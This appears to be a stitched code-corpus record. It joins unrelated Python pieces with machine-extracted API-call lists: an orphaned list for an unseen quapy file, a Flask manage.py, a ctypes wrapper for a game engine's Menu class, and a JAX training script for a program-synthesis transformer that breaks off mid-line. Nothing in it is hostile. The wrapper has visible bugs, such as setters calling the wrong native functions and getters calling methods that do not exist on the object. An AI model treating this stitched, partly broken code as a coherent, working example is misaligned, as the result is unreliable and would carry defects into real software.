[((9694, 9727), 'itertools.product', 'itertools.product', (['*params_values'], {}), '(*params_values)\n', (9711, 9727), False, 'import itertools\n'), ((7798, 7943), 'quapy.evaluation.artificial_prevalence_prediction', 'artificial_prevalence_prediction', (['model', 'val_split', 'self.sample_size'], {'n_prevpoints': 'self.n_prevpoints', 'eval_budget': 'self.eval_budget'}), '(model, val_split, self.sample_size,\n n_prevpoints=self.n_prevpoints, eval_budget=self.eval_budget, **commons)\n', (7830, 7943), False, 'from quapy.evaluation import artificial_prevalence_prediction, natural_prevalence_prediction, gen_prevalence_prediction\n'), ((9200, 9236), 'util._check_sample_size', '_check_sample_size', (['self.sample_size'], {}), '(self.sample_size)\n', (9218, 9236), False, 'from util import _check_sample_size\n'), ((9538, 9576), 'signal.signal', 'signal.signal', (['signal.SIGALRM', 'handler'], {}), '(signal.SIGALRM, handler)\n', (9551, 9576), False, 'import signal\n'), ((7169, 7194), 'quapy.error.from_name', 'qp.error.from_name', (['error'], {}), '(error)\n', (7187, 7194), True, 'import quapy as qp\n'), ((8074, 8150), 'quapy.evaluation.natural_prevalence_prediction', 'natural_prevalence_prediction', (['model', 'val_split', 'self.sample_size'], {}), '(model, val_split, self.sample_size, **commons)\n', (8103, 8150), False, 'from quapy.evaluation import artificial_prevalence_prediction, natural_prevalence_prediction, gen_prevalence_prediction\n'), ((9856, 9882), 'signal.alarm', 'signal.alarm', (['self.timeout'], {}), '(self.timeout)\n', (9868, 9882), False, 'import signal\n'), ((8240, 8325), 'quapy.evaluation.gen_prevalence_prediction', 'gen_prevalence_prediction', (['model'], {'gen_fn': 'val_split', 'eval_budget': 'self.eval_budget'}), '(model, gen_fn=val_split, eval_budget=self.eval_budget\n )\n', (8265, 8325), False, 'from quapy.evaluation import artificial_prevalence_prediction, natural_prevalence_prediction, gen_prevalence_prediction\n'), ((10562, 10577), 'copy.deepcopy', 'deepcopy', (['model'], {}), '(model)\n', (10570, 10577), False, 'from copy import deepcopy\n'), ((10692, 10707), 'signal.alarm', 'signal.alarm', (['(0)'], {}), '(0)\n', (10704, 10707), False, 'import signal\n')]
# -*- coding: utf-8 -*- import os from flask_migrate import Migrate from app import create_app, db from app.models import User, Role, PoseToLocation app = create_app(os.getenv('FLASK_CONFIG') or 'default') migrate = Migrate(app, db) # migrate 的新建 我们需要扫描到这些文件我们才能创建 @app.shell_context_processor def make_shell_context(): return dict(db=db, User=User, Role=Role, PoseToLocation=PoseToLocation) # 单元测试 @app.cli.command() def test(): """ run the unit tests """ import unittest tests = unittest.TestLoader().discover('tests') unittest.TextTestRunner(verbosity=2).run(tests)
[ "unittest.TestLoader", "flask_migrate.Migrate", "unittest.TextTestRunner", "os.getenv" ]
[((220, 236), 'flask_migrate.Migrate', 'Migrate', (['app', 'db'], {}), '(app, db)\n', (227, 236), False, 'from flask_migrate import Migrate\n'), ((170, 195), 'os.getenv', 'os.getenv', (['"""FLASK_CONFIG"""'], {}), "('FLASK_CONFIG')\n", (179, 195), False, 'import os\n'), ((505, 526), 'unittest.TestLoader', 'unittest.TestLoader', ([], {}), '()\n', (524, 526), False, 'import unittest\n'), ((549, 585), 'unittest.TextTestRunner', 'unittest.TextTestRunner', ([], {'verbosity': '(2)'}), '(verbosity=2)\n', (572, 585), False, 'import unittest\n')]
# Jetfuel Game Engine- A SDL-based 2D game-engine # Copyright (C) 2018 InfernoStudios # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from ctypes import c_uint from ctypes import c_int from ctypes import c_void_p from ctypes import c_bool from ctypes import c_wchar_p from jetfuel.draw.rectangleinterface import rectangle_interface from jetfuel.draw.image import image class menu(rectangle_interface): def __init__(self, jetfuelsoloader, maxheight=None, columngap=None, buttongap=None): self._jetfuel = jetfuelsoloader.jetfuelso; if(maxheight is not None and columngap is not None and buttongap is not None): self._jetfuel.Menu_new_from_heights_and_gaps.argtypes = [c_uint, c_uint, c_uint]; self._jetfuel.Menu_new_from_heights_and_gaps.restype = c_void_p; self.drawableref = self._jetfuel.Menu_new_from_heights_and_gaps( maxheight, columngap, buttongap); else: self._jetfuel.Menu_new.restype = c_void_p; self.drawableref = self._jetfuel.Menu_new(); print("Constructed empty drawableref!"); def get_max_height(self): self._jetfuel.Menu_get_max_height.argtypes = [c_void_p]; self._jetfuel.Menu_get_max_height.restype = c_uint; return self._jetfuel.Menu_get_max_height(self.drawableref); def set_max_height(self, maxheight): self._jetfuel.Menu_set_max_height.argtypes = [c_void_p, c_uint]; self._jetfuel.Menu_set_max_height(self.drawableref, maxheight); def get_column_gap(self): self._jetfuel.Menu_get_column_gap.argtypes = [c_void_p]; self._jetfuel.Menu_get_column_gap.restype = c_uint; return self._jetfuel.Menu_get_column_gap(self.drawableref); def set_column_gap(self, columngap): self._jetfuel.Menu_set_column_gap.argtypes = [c_void_p, c_uint]; self._jetfuel.Menu_set_column_height(self.drawableref, columngap); def get_button_gap(self): self._jetfuel.Menu_get_button_gap.argtypes = [c_void_p]; self._jetfuel.Menu_get_button_gap.restype = c_uint; return self._jetfuel.Menu_get_column_gap(self.drawableref); def set_button_gap(self, buttongap): self._jetfuel.Menu_set_max_height.argtypes = [c_void_p, c_uint]; self._jetfuel.Menu_set_max_height(self.drawableref, buttongap); def get_container_box_image(self, jetfuelsoloader): self._jetfuel.Menu_get_container_box_image.argtypes = [c_void_p]; self._jetfuel.Menu_get_container_box_image.restype = c_void_p; containerboximage = image(jetfuelsoloader); self._jetfuel.Image_delete.argtypes = [c_void_p]; self._jetfuel.Image_delete(containerboximage.imageref); containerboximage.imageref = self._jetfuel.Menu_get_container_box_image( self.drawableref); return containerboximage; def set_container_box_image(self, image, borderwidth, borderheight): self._jetfuel.Menu_set_container_box_image.argtypes = [c_void_p, c_void_p, c_uint, c_uint]; self._jetfuel.Menu_set_container_box_image(image.imageref, borderwidth, borderheight); def get_container_box_border_width(self): self._jetfuel.Menu_get_container_box_border_width.argtypes = [c_void_p]; self._jetfuel.Menu_get_container_box_border_width.restype = c_uint; return self._jetfuel.Menu_get_container_box_border_width( self.drawableref); def get_container_box_border_height(self): self._jetfuel.Menu_get_container_box_border_height.argtypes = [c_void_p]; self._jetfuel.Menu_get_container_box_border_height.restype = c_uint; return self._jetfuel.Menu_get_container_box_border_height( self.drawableref); def add_button(self, buttoncharsreplacement, uisactiontowatchfor, messagetosenduponclick, messagebus): self._jetfuel.Menu_add_button.argtypes = [c_void_p, c_void_p, c_wchar_p, c_wchar_p, c_void_p]; self._jetfuel.Menu_add_button.restype = c_bool; return self._jetfuel.Menu_add_button(self.drawableref, buttoncharsreplacement.buttoncharsref, uisactiontowatchfor, messagetosenduponclick, messagebus.messagebusref); def get_position_x(self): self._jetfuel.Menu_get_position_x.argtypes = [c_void_p]; self._jetfuel.Menu_get_position_x.restype = c_int; return self.Menu_get_position_x(self.drawableref); def get_position_y(self): self._jetfuel.Menu_get_position_y.argtypes = [c_void_p]; self._jetfuel.Menu_get_position_y.restype = c_int; return self.Menu_get_position_y(self.drawableref); def set_position(self, x, y): self._jetfuel.Menu_set_position.argtypes = [c_void_p, c_int, c_int]; self._jetfuel.Menu_set_position(self.drawableref, x, y); def get_rect_to_draw_width(self): self._jetfuel.Menu_get_rect_to_draw_width.argtypes = [c_void_p]; self._jetfuel.Menu_get_rect_to_draw_width.restype = c_int; return self.Menu_get_rect_to_draw_width(self.drawableref); def get_rect_to_draw_height(self): self._jetfuel.Menu_get_rect_to_draw_height.argtypes = [c_void_p]; self._jetfuel.Menu_get_rect_to_draw_height.restype = c_int; return self.Menu_get_rect_to_draw_height(self.drawableref);
[ "jetfuel.draw.image.image" ]
[((3591, 3613), 'jetfuel.draw.image.image', 'image', (['jetfuelsoloader'], {}), '(jetfuelsoloader)\n', (3596, 3613), False, 'from jetfuel.draw.image import image\n')]
# coding=utf-8 # Copyright 2021 The Google Research Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # python3 """Train seq-to-seq model on random supervised training tasks.""" # pytype: disable=wrong-arg-count # pytype: disable=attribute-error import collections import functools import json import os import random import sys import time from absl import app from absl import flags from absl import logging from flax import jax_utils from flax import linen as nn from flax import optim from flax.metrics import tensorboard from flax.training import checkpoints from flax.training import common_utils import jax import jax.numpy as jnp import numpy as np import tensorflow.compat.v2 as tf from latent_programmer import decode from latent_programmer import models as base_models from latent_programmer.decomposition_transformer_attention import decomposition_models as models from latent_programmer.decomposition_transformer_attention import input_pipeline from latent_programmer.tasks.robust_fill import dsl from latent_programmer.tasks.robust_fill import tokens as dsl_tokens sys.path.append('../../') gfile = tf.io.gfile FLAGS = flags.FLAGS flags.DEFINE_integer('seed', 0, 'Fixed random seed for training.') flags.DEFINE_float('lr', 1e-3, 'Learning rate.') flags.DEFINE_float('weight_decay', 1e-1, 'Decay factor for AdamW-style weight decay.') flags.DEFINE_integer('embedding_dim', 256, 'Embedding dimension.') flags.DEFINE_integer('hidden_dim', 512, 'Hidden dimension.') flags.DEFINE_integer('num_heads', 4, 'Number of layers.') flags.DEFINE_integer('num_layers', 3, 'Number of Transformer heads.') flags.DEFINE_boolean('slow_decode', True, 'Use slow decoding for prediction?') flags.DEFINE_string('dataset_filepattern', None, 'Filepattern for TFRecord dataset.') flags.DEFINE_integer('per_device_batch_size', 16, 'Number of program tasks in a batch.') flags.DEFINE_integer('num_strings_per_task', 4, 'Number of input/output strings per task.') flags.DEFINE_integer('max_program_length', 100, 'Maximum number of tokens in program.') flags.DEFINE_integer('max_characters', 120, 'Maximum number of characters in input/output strings.') flags.DEFINE_string('save_dir', None, 'Directory to save results to.') flags.DEFINE_integer('num_train_steps', 2000000, 'Number of training steps.') flags.DEFINE_integer('num_eval_steps', 10, 'Number of evaluation steps.') flags.DEFINE_integer('log_freq', 1000, 'Number of steps between training logs.') flags.DEFINE_integer('eval_freq', 2000, 'Number of steps between eval.') flags.DEFINE_integer('predict_freq', 50000, 'Number of steps between prediction (beam search).') flags.DEFINE_integer('checkpoint_freq', 50000, 'Number of steps between checkpoint saves.') flags.DEFINE_integer('finetune_start_step', -1, 'Step the initial checkpoint should start at for ' 'finetuning, or -1 if not finetuning.') flags.DEFINE_bool('restore_checkpoints', True, 'Whether to restore from existing model checkpoints.') flags.DEFINE_string('attention_mask_type', 'bos_full_attention', 'The kind of attention mask to use. Options are: baseline, ' 'bos_to_bos, bos_full_attention') flags.DEFINE_bool('use_relative_attention', True, 'Whether to use relative positonal embeddings.') flags.DEFINE_bool('bos_special_attention', False, 'Whether to use special relative attention computation for ' 'BOS tokens.') _internal = False if not _internal: flags.DEFINE_string('xm_parameters', None, 'String specifying hyperparamter search.') def create_learning_rate_scheduler( base_learning_rate=0.5, factors='constant * linear_warmup * rsqrt_normalized_decay', warmup_steps=16000, decay_factor=0.5, steps_per_decay=50000, steps_per_cycle=100000): """Creates learning rate schedule. Interprets factors in the factors string which can consist of: * constant: interpreted as the constant value, * linear_warmup: interpreted as linear warmup until warmup_steps, * rsqrt_decay: divide by square root of max(step, warmup_steps) * decay_every: Every k steps decay the learning rate by decay_factor. * cosine_decay: Cyclic cosine decay, uses steps_per_cycle parameter. Args: base_learning_rate: float, the starting constant for the lr schedule. factors: a string with factors separated by '*' that defines the schedule. warmup_steps: how many steps to warm up for in the warmup schedule. decay_factor: The amount to decay the learning rate by. steps_per_decay: How often to decay the learning rate. steps_per_cycle: Steps per cycle when using cosine decay. Returns: A function learning_rate(step): float -> {'learning_rate': float}, the step-dependent lr. """ factors = [n.strip() for n in factors.split('*')] def step_fn(step): """Step to learning rate function.""" ret = 1.0 for name in factors: if name == 'constant': ret *= base_learning_rate elif name == 'linear_warmup': ret *= jnp.minimum(1.0, step / warmup_steps) elif name == 'rsqrt_decay': ret /= jnp.sqrt(jnp.maximum(1.0, step - warmup_steps)) elif name == 'rsqrt_normalized_decay': ret *= jnp.sqrt(warmup_steps) ret /= jnp.sqrt(jnp.maximum(step, warmup_steps)) elif name == 'decay_every': ret *= (decay_factor**(step // steps_per_decay)) elif name == 'cosine_decay': progress = jnp.maximum(0.0, (step - warmup_steps) / float(steps_per_cycle)) ret *= jnp.maximum(0.0, 0.5 * (1.0 + jnp.cos(jnp.pi * (progress % 1.0)))) else: raise ValueError('Unknown factor %s.' % name) return jnp.asarray(ret, dtype=jnp.float32) return step_fn def compute_weighted_cross_entropy(logits, targets, weights=None): """Compute weighted cross entropy and entropy for log probs and targets. Args: logits: `[batch, length, num_classes]` float array. targets: categorical targets `[batch, length]` int array. weights: None or array of shape [batch, length, 1] Returns: Tuple of scalar loss and batch normalizing factor. """ if logits.ndim != targets.ndim + 1: raise ValueError('Incorrect shapes. Got shape %s logits and %s targets' % (str(logits.shape), str(targets.shape))) onehot_targets = common_utils.onehot(targets, logits.shape[-1]) loss = -jnp.sum(onehot_targets * nn.log_softmax(logits), axis=-1) normalizing_factor = jnp.prod(jnp.asarray(targets.shape)) if weights is not None: loss = loss * weights normalizing_factor = weights.sum() return loss.sum(), normalizing_factor def compute_weighted_accuracy(logits, targets, weights=None): """Compute weighted accuracy for log probs and targets. Args: logits: `[batch, length, num_classes]` float array. targets: categorical targets `[batch, length]` int array. weights: None or array of shape [batch, length, 1] Returns: Tuple of scalar accuracy and batch normalizing factor. """ if logits.ndim != targets.ndim + 1: raise ValueError('Incorrect shapes. Got shape %s logits and %s targets' % (str(logits.shape), str(targets.shape))) acc = jnp.equal(jnp.argmax(logits, axis=-1), targets) normalizing_factor = jnp.prod(jnp.asarray(targets.shape)) if weights is not None: acc = acc * weights normalizing_factor = weights.sum() return acc.sum(), normalizing_factor def compute_metrics(logits, targets, weights): """Compute summary metrics.""" loss, weight_sum = compute_weighted_cross_entropy(logits, targets, weights) acc, _ = compute_weighted_accuracy(logits, targets, weights) metrics = { 'loss': loss, 'accuracy': acc, 'denominator': weight_sum, } metrics = jax.lax.psum(metrics, 'batch') return metrics # Train / eval / decode step functions. # ----------------------------------------------------------------------------- def train_step(optimizer, inputs, outputs, programs, learning_rate_fn, config, dropout_rng): """Train on batch of program tasks.""" # We handle PRNG splitting inside the top pmap, rather # than handling it outside in the training loop - doing the # latter can add some stalls to the devices. dropout_rng, new_dropout_rng = jax.random.split(dropout_rng) weights = jnp.where(programs > 0, 1, 0).astype(jnp.float32) def loss_fn(params): """Loss function used for training.""" logits = models.DecomposeAttentionTransformer(config).apply( {'params': params}, inputs, outputs, programs, rngs={'dropout': dropout_rng}) loss, weight_sum = compute_weighted_cross_entropy(logits, programs, weights) mean_loss = loss / weight_sum return mean_loss, logits step = optimizer.state.step lr = learning_rate_fn(step) grad_fn = jax.value_and_grad(loss_fn, has_aux=True) (_, logits), grad = grad_fn(optimizer.target) grad = jax.lax.pmean(grad, 'batch') new_optimizer = optimizer.apply_gradient(grad, learning_rate=lr) # Get metrics. metrics = compute_metrics(logits, programs, weights) metrics['learning_rate'] = lr return new_optimizer, metrics, new_dropout_rng def eval_step(params, inputs, outputs, programs, eos_token, config): """Collect metrics for evaluation during training.""" weights = jnp.where( jnp.logical_and(programs > 0, jnp.logical_and(programs != config.base_config.bos_token, programs != eos_token)), 1, 0).astype(jnp.float32) logits = models.DecomposeAttentionTransformer(config).apply( {'params': params}, inputs, outputs, programs) return compute_metrics(logits, programs, weights) def initialize_cache(inputs, outputs, programs, max_decode_len, config): """Initialize a cache for a given input shape and max decode length.""" target_shape = (programs.shape[0], max_decode_len) dtype = config.base_config.dtype initial_variables = models.DecomposeAttentionTransformer(config).init( jax.random.PRNGKey(0), jnp.ones(inputs.shape, dtype), jnp.ones(outputs.shape, dtype), jnp.ones(target_shape, dtype)) return initial_variables['cache'] def predict_step(params, inputs, outputs, cache, beam_size, eos_token, max_decode_len, config, slow_decode=True): """Predict translation with fast decoding beam search on a batch.""" # Prepare transformer fast-decoder call for beam search: for beam search, we # need to set up our decoder model to handle a batch size equal to # batch_size * beam_size, where each batch item's data is expanded in-place # rather than tiled. flat_encoded = decode.flat_batch_beam_expand( models.DecomposeAttentionTransformer(config).apply( {'params': params}, inputs, outputs, method=models.DecomposeAttentionTransformer.encode), beam_size) encoded_padding_mask = jnp.where(outputs > 0, 1, 0).astype(jnp.float32) flat_encoded_padding_mask = decode.flat_batch_beam_expand( encoded_padding_mask, beam_size) if slow_decode: def tokens_ids_to_logits(flat_ids): """Token slice to logits from decoder model.""" # --> [batch * beam, 1, vocab] flat_logits = models.DecomposeAttentionTransformer(config=config).apply( {'params': params}, flat_ids, flat_encoded, flat_encoded_padding_mask, method=models.DecomposeAttentionTransformer.decode) return flat_logits else: def tokens_ids_to_logits(flat_ids, flat_cache): """Token slice to logits from decoder model.""" # --> [batch * beam, 1, vocab] flat_logits, new_vars = models.DecomposeAttentionTransformer( config=config).apply( {'params': params, 'cache': flat_cache}, flat_ids, flat_encoded, flat_encoded_padding_mask, mutable=['cache'], method=models.DecomposeAttentionTransformer.decode) new_flat_cache = new_vars['cache'] # Remove singleton sequence-length dimension: # [batch * beam, 1, vocab] --> [batch * beam, vocab] flat_logits = flat_logits.squeeze(axis=1) return flat_logits, new_flat_cache # Using the above-defined single-step decoder function, run a # beam search over possible sequences given input encoding. beam_seqs, _ = decode.beam_search( inputs, cache, tokens_ids_to_logits, beam_size=beam_size, alpha=0.6, bos_token=config.base_config.bos_token, eos_token=eos_token, max_decode_len=max_decode_len, slow_decode=slow_decode) # Beam search returns [n_batch, n_beam, n_length] with beam dimension # sorted in increasing order of log-probability. return beam_seqs # Util functions for prediction # ----------------------------------------------------------------------------- def pad_examples(x, desired_batch_size): """Expand batch to desired size by repeating last slice.""" batch_pad = desired_batch_size - x.shape[0] tile_dims = [1] * len(x.shape) tile_dims[0] = batch_pad return np.concatenate([x, np.tile(x[-1], tile_dims)], axis=0) def tohost(x): """Collect batches from all devices to host and flatten batch dimensions.""" n_device, n_batch, *remaining_dims = x.shape return x.reshape((n_device * n_batch,) + tuple(remaining_dims)) def per_host_sum_pmap(in_tree): """Execute psum on in_tree's leaves over one device per host.""" host2devices = collections.defaultdict(list) for d in jax.devices(): host2devices[d.host_id].append(d) devices = [host2devices[k][0] for k in host2devices] host_psum = jax.pmap(lambda x: jax.lax.psum(x, 'i'), 'i', devices=devices) def pre_pmap(xs): return jax.tree_map(lambda x: jnp.broadcast_to(x, (1,) + x.shape), xs) def post_pmap(xs): return jax.tree_map(lambda x: x[0], xs) return post_pmap(host_psum(pre_pmap(in_tree))) def eval_predicted(predicted, inputs, outputs, parse_beam_fn): """Evaluate predicted program beams.""" best_p, best_score = None, -1 # predicted shape [beam_size, length] for beam in predicted[::-1]: try: p = parse_beam_fn(beam) p_outs = [p(inp) for inp in inputs] score = np.sum([p_out == out for p_out, out in zip(p_outs, outputs)]) if score > best_score: best_p, best_score = p, score except: # pylint: disable=bare-except pass if best_score >= len(inputs): # Found solution. break return best_p, best_score def shorten(key): splits = key.split('_') return ''.join(s[0] for s in splits) def main(_): tf.enable_v2_behavior() tf.random.set_seed(FLAGS.seed) np.random.seed(FLAGS.seed) random.seed(FLAGS.seed) # BOS special attention only makes sense if we are using relative attention # and it's not the baseline. if FLAGS.bos_special_attention and (not FLAGS.use_relative_attention or FLAGS.attention_mask_type == 'baseline'): raise ValueError( "bos_special_attention doesn't work when use_relative_attention={} and " 'attention_mask_type={}'.format(FLAGS.use_relative_attention, FLAGS.attention_mask_type)) if not gfile.isdir(FLAGS.save_dir): gfile.makedirs(FLAGS.save_dir) hparam_str_dict = dict(seed=FLAGS.seed, lr=FLAGS.lr) # Get hyperparmaters if FLAGS.xm_parameters: for key, value in json.loads(FLAGS.xm_parameters).items(): if key not in hparam_str_dict: hparam_str_dict[key] = value hparam_str = ','.join(['%s=%s' % (shorten(k), str(hparam_str_dict[k])) for k in sorted(hparam_str_dict.keys())]) # Number of local devices for this host. n_devices = jax.local_device_count() if jax.host_id() == 0: summary_writer = tensorboard.SummaryWriter( os.path.join(FLAGS.save_dir, 'tb', hparam_str)) batch_size = FLAGS.per_device_batch_size * n_devices io_shape = (FLAGS.per_device_batch_size, FLAGS.num_strings_per_task, FLAGS.max_characters) program_shape = (FLAGS.per_device_batch_size, FLAGS.max_program_length) # Setup DSL # --------------------------------------------------------------------------- # Build token tables. id_char_table = {i+1: char for (i, char) in enumerate(dsl.CHARACTER)} char_id_table = {char: id for id, char in id_char_table.items()} id_token_table, token_id_table = dsl_tokens.build_token_tables() io_vocab_size = len(char_id_table) + 1 # For padding. program_vocab_size = len(token_id_table) + 1 bos_token = token_id_table[dsl.BOS] eos_token = token_id_table[dsl.EOS] # Parse io and program token sequences (for eval). def decode_io(inputs, outputs): """Decode io examples tokens.""" def decode_str(s): """Decode string tokens.""" return ''.join([id_char_table[c_id] for c_id in s if c_id > 0]) inps, outs = [], [] for inp, out in zip(inputs, outputs): inps.append(decode_str(inp)) outs.append(decode_str(out)) return inps, outs def decode_program(program): """Decode program tokens.""" program = program[:np.argmax(program == eos_token) + 1].astype(np.int32) program = program[program != bos_token] try: return dsl.decode_program(program.tolist(), id_token_table) except: # pylint: disable=bare-except return None # Program does not compile. # Load Dataset # --------------------------------------------------------------------------- logging.info('Initializing dataset.') if not FLAGS.dataset_filepattern: raise ValueError('Must specify filepattern to dataset.') # Training dataset. logging.info('Loading dataset from %s', FLAGS.dataset_filepattern) padded_shapes = (io_shape[1:], io_shape[1:], program_shape[1:]) logging.info('padded_shapes: %s', padded_shapes) dataset = input_pipeline.create_dataset_from_tf_record( FLAGS.dataset_filepattern, token_id_table, char_id_table) dataset = dataset.padded_batch( batch_size, padded_shapes=padded_shapes, drop_remainder=True) # Split evaluation and training. eval_ds = dataset.take(FLAGS.num_eval_steps) # Decrease batch of predict dataset to handle beam search. predict_ds = eval_ds.unbatch().padded_batch( int(np.ceil(batch_size / 10)), padded_shapes=padded_shapes) train_ds = dataset.skip(FLAGS.num_eval_steps).repeat() train_iter = train_ds.as_numpy_iterator() # Build Model and Optimizer # --------------------------------------------------------------------------- use_dropout = False base_config = base_models.TransformerConfig( vocab_size=io_vocab_size, output_vocab_size=program_vocab_size, shift=True, emb_dim=FLAGS.embedding_dim, num_heads=FLAGS.num_heads, num_layers=FLAGS.num_layers, qkv_dim=FLAGS.embedding_dim, mlp_dim=FLAGS.hidden_dim, max_len=max(FLAGS.max_characters, FLAGS.max_program_length), use_relative_attention=FLAGS.use_relative_attention, deterministic=not use_dropout, decode=False, bos_token=bos_token) train_config = models.DecomposeAttentionTransformerConfig( base_config=base_config, attention_mask_type=FLAGS.attention_mask_type, bos_special_attention=FLAGS.bos_special_attention) eval_config = models.DecomposeAttentionTransformerConfig( base_config=base_config.replace(deterministic=not use_dropout), attention_mask_type=FLAGS.attention_mask_type, bos_special_attention=FLAGS.bos_special_attention) predict_config = models.DecomposeAttentionTransformerConfig( base_config=base_config.replace( shift=False, deterministic=not use_dropout, decode=not FLAGS.slow_decode), attention_mask_type=FLAGS.attention_mask_type, bos_special_attention=FLAGS.bos_special_attention) rng = jax.random.PRNGKey(FLAGS.seed) rng = jax.random.fold_in(rng, jax.host_id()) rng, init_rng = jax.random.split(rng) m = models.DecomposeAttentionTransformer(eval_config) initial_variables = jax.jit(m.init)( {'params': init_rng, 'dropout': init_rng}, jnp.ones(io_shape, jnp.float32), jnp.ones(io_shape, jnp.float32), jnp.ones(program_shape, jnp.float32)) optimizer_def = optim.Adam( FLAGS.lr, beta1=0.9, beta2=0.98, eps=1e-9, weight_decay=FLAGS.weight_decay) optimizer = optimizer_def.create(initial_variables['params']) del initial_variables # Don't keep a copy of the initial model. start_step = 0 if FLAGS.restore_checkpoints: # Restore unreplicated optimizer + model state from last checkpoint. optimizer = checkpoints.restore_checkpoint( os.path.join(FLAGS.save_dir, 'checkpoints', hparam_str), optimizer) # Grab last step. start_step = int(optimizer.state.step) logging.info('Found model checkpointed at step %d.', start_step) if FLAGS.finetune_start_step > 0: logging.info('Checking that start_step (%s) == finetune_start_step (%s)', start_step, FLAGS.finetune_start_step) assert start_step == FLAGS.finetune_start_step # Replicate optimizer. optimizer = jax_utils.replicate(optimizer) # TODO(jxihong): Implement fast decoding. assert FLAGS.slow_decode, 'Fast decoding is not implemented yet.' if FLAGS.finetune_start_step <= 0: learning_rate_fn = create_learning_rate_scheduler( base_learning_rate=FLAGS.lr) else: # Constant LR for finetuning. learning_rate_fn = create_learning_rate_scheduler( base_learning_rate=FLAGS.lr, factors='constant') p_train_step = jax.pmap( functools.partial( train_step, learning_rate_fn=learning_rate_fn, config=train_config), axis_name='batch') p_eval_step = jax.pmap( functools.partial(eval_step, eos_token=eos_token, config=eval_config), axis_name='batch') p_init_cache = jax.pmap( functools.partial( initialize_cache, max_decode_len=FLAGS.max_program_length, config=predict_config), axis_name='batch') p_pred_step = jax.pmap( functools.partial( predict_step, eos_token=eos_token, max_decode_len=FLAGS.max_program_length, config=predict_config, slow_decode=FLAGS.slow_decode), axis_name='batch', static_broadcasted_argnums=(4,)) # Main Train Loop # --------------------------------------------------------------------------- dropout_rng = jax.random.split(rng, jax.local_device_count()) del rng metrics_all = [] tick = time.time() for step in range(start_step, FLAGS.num_train_steps): inputs, outputs, programs = common_utils.shard(next(train_iter)) optimizer, metrics, dropout_rng = p_train_step( optimizer, inputs, outputs, programs, dropout_rng=dropout_rng) metrics_all.append(metrics) is_last_step = step == FLAGS.num_train_steps - 1 # Save a Checkpoint if (step % FLAGS.checkpoint_freq == 0 and step > 0) or is_last_step: if jax.host_id() == 0: # Save unreplicated optimizer + model state. checkpoints.save_checkpoint( os.path.join(FLAGS.save_dir, 'checkpoints', hparam_str), jax_utils.unreplicate(optimizer), step) # Periodic metric handling. # Training Metrics if (step and step % FLAGS.log_freq == 0) or is_last_step: logging.info('Gathering training metrics.') metrics_all = common_utils.get_metrics(metrics_all) lr = metrics_all.pop('learning_rate').mean() metrics_sums = jax.tree_map(jnp.sum, metrics_all) denominator = metrics_sums.pop('denominator') summary = jax.tree_map( lambda x: x / denominator, # pylint: disable=cell-var-from-loop metrics_sums) summary['learning_rate'] = lr # Calculate (clipped) perplexity after averaging log-perplexities: summary['perplexity'] = jnp.clip(jnp.exp(summary['loss']), a_max=1.0e4) if jax.host_id() == 0: logging.info('Train in step: %d, loss: %.4f', step, summary['loss']) tock = time.time() steps_per_sec = FLAGS.log_freq / (tock - tick) tick = tock summary_writer.scalar('train/steps per second', steps_per_sec, step) for key, val in summary.items(): summary_writer.scalar('train/' + key, val, step) summary_writer.flush() # Reset metric accumulation for next evaluation cycle. metrics_all = [] # Evaluation Metrics if (step and step % FLAGS.eval_freq == 0) or is_last_step: logging.info('Gathering evaluation metrics.') t_evaluation_start = time.time() eval_metrics = [] for batches in eval_ds.as_numpy_iterator(): inputs, outputs, programs = common_utils.shard(batches) metrics = p_eval_step(optimizer.target, inputs, outputs, programs) eval_metrics.append(metrics) eval_metrics = common_utils.get_metrics(eval_metrics) eval_metrics_sums = jax.tree_map(jnp.sum, eval_metrics) eval_denominator = eval_metrics_sums.pop('denominator') eval_summary = jax.tree_map( lambda x: x / eval_denominator, # pylint: disable=cell-var-from-loop eval_metrics_sums) if jax.host_id() == 0: logging.info('Evaluation time: %.4f s step %d, loss: %.4f.', time.time()-t_evaluation_start, step, eval_summary['loss']) for key, val in eval_summary.items(): summary_writer.scalar('eval/' + key, val, step) summary_writer.flush() # Beam search metrics. if (step and step % FLAGS.predict_freq == 0) or is_last_step: logging.info('Gathering beam search metrics.') for beam_size in [1, 5, 10, 20, 50]: t_inference_start = time.time() pred_acc = 0 pred_denominator = 0 ios, targets, predictions, top_of_beams = [], [], [], [] for batches in predict_ds.as_numpy_iterator(): pred_batch = batches # Handle final odd-sized batch by padding instead of dropping it. cur_pred_batch_size = pred_batch[0].shape[0] if cur_pred_batch_size % n_devices: padded_size = int( np.ceil(cur_pred_batch_size / n_devices) * n_devices) # pylint: disable=cell-var-from-loop pred_batch = jax.tree_map( lambda x: pad_examples(x, padded_size), pred_batch) inputs, outputs, programs = common_utils.shard(pred_batch) cache = (p_init_cache(inputs, outputs, programs) if not FLAGS.slow_decode else None) predicted = p_pred_step(optimizer.target, inputs, outputs, cache, beam_size) predicted = tohost(predicted) inputs, outputs, programs = map(tohost, (inputs, outputs, programs)) pred_denominator += programs.shape[0] for i, beams in enumerate(predicted): inps, outs = decode_io(inputs[i], outputs[i]) p, p_score = eval_predicted( beams, inps, outs, parse_beam_fn=decode_program) if p_score >= len(inps): pred_acc += 1 ios.append(' ; '.join(map(str, zip(inps, outs)))) targets.append(decode_program(programs[i]).to_string()) try: predictions.append(p.to_string()) except: # pylint: disable=bare-except predictions.append('Did not compile') logging.info('ios: %s', ios[-1]) logging.info('target: %s', targets[-1]) beams_log = [] for beam in beams: try: beams_log.append(decode_program(beam).to_string()) except: # pylint: disable=bare-except beams_log.append('Did not compile') logging.info('predicted beam: %s', '\n'.join(beams_log)) top_of_beam = [] for index, beam in enumerate(beams[:-5:-1]): try: decoded_program = decode_program(beam).to_string() except: # pylint: disable=bare-except decoded_program = 'Did not compile' top_of_beam.append('index: {}, decoded: {}, tokens: {}'.format( index, decoded_program, beam)) top_of_beams.append('\n\n'.join(top_of_beam)) all_pred_acc, all_pred_denominator = 